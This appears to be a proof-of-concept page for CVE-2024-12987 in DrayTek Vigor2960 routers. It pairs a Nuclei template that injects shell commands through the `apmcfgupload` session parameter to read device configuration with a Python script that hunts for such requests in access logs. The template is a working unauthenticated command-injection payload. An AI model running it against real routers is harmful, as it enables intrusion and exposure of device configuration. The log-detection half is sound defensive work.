POC - draytek-vigor2960 (CVE-2024-12987)

Nuclei template: draytek-vigor2960-cmd-injection.yaml
id: draytek-vigor2960-cmd-injection

info:
  name: DrayTek Vigor2960 RCE via apmcfgupload (CVE-2024-12987)
  author: quangvu
  severity: critical
  description: |
    DrayTek Vigor2960 routers running firmware version 1.5.1.4 are vulnerable
    to remote command injection via the `apmcfgupload` endpoint. This allows
    unauthenticated attackers to execute arbitrary commands on the device.
  tags: rce,draytek,router,command-injection,iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxx0.%2524c%2525%24{IFS}cat${IFS}/etc/persistence/config/device_in*"
    headers:
      User-Agent: nuclei-scanner
    matchers:
      - type: word
        words:
          - "ModelName"
          - "Vigor2960"
          - "SoftwareVersion"
        condition: and
        part: body
    extractors:
      - type: regex
        part: body
        regex:
          - "ModelName'.*?'(.*?)'"
          - "SoftwareVersion'.*?'(.*?)'"
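The template above injects into the `session` parameter of `apmcfgupload`, with `$` double-percent-encoded (`%2524`) and `${IFS}` standing in for spaces. The following detection script is an added example and is not part of the original POC: it reads web-server access-log lines, fully decodes nested percent-encoding, and flags any request to that endpoint whose query string is not a plain alphanumeric session token. The log format (common/combined) and the assumption that a legitimate session value is alphanumeric are mine, not stated on the page; the sample log lines are constructed.

```python
"""Hunt for CVE-2024-12987-style injection attempts against the DrayTek
Vigor2960 `apmcfgupload` endpoint in web-server access logs.

Added example, not part of the original POC. Assumptions (not on the page):
the log is in common/combined format, and a legitimate `session` value is a
plain alphanumeric token, so anything else in the query string is suspicious.
"""
import re
from urllib.parse import unquote, urlsplit

TARGET_PATH = "/cgi-bin/mainfunction.cgi/apmcfgupload"

# Assumption: a legitimate session token is alphanumeric only (allow-list).
BENIGN_QUERY = re.compile(r"session=[A-Za-z0-9]+")

# Shell metacharacters plus the ${IFS} whitespace substitute used in the POC.
SHELL_META = re.compile(r"\$\{IFS\}|[$`;|&<>]")

# Common log format: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: a legitimate request, an injection attempt with
# the POC's payload shape, and an unrelated request.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Jan/2025:12:00:01 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=abc123def456 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Jan/2025:12:00:07 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxx0.%2524c%2525%24{IFS}cat${IFS}/etc/persistence/config/device_in* HTTP/1.1" 200 2048',
    '198.51.100.2 - - [10/Jan/2025:12:01:00 +0000] "GET /index.html HTTP/1.1" 200 100',
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo nested percent-encoding (the POC double-encodes `$` as %2524)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line: str):
    """Return an alert dict for a suspicious apmcfgupload request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != TARGET_PATH:
        return None
    decoded = fully_decode(parts.query)
    if BENIGN_QUERY.fullmatch(decoded):
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "decoded_query": decoded,
        "shell_metachars": sorted(set(SHELL_META.findall(decoded))),
    }


def scan_logs(lines):
    """Run inspect_line over an iterable of log lines and keep the alerts."""
    return [alert for alert in (inspect_line(l) for l in lines) if alert]


if __name__ == "__main__":
    for alert in scan_logs(SAMPLE_LOGS):
        print(alert)
```

A 200 response on a flagged line is worth prioritising, since the template's matchers expect the device's configuration to come back in the body of a successful injection; the allow-list approach also catches variants that swap the command for something other than `cat`.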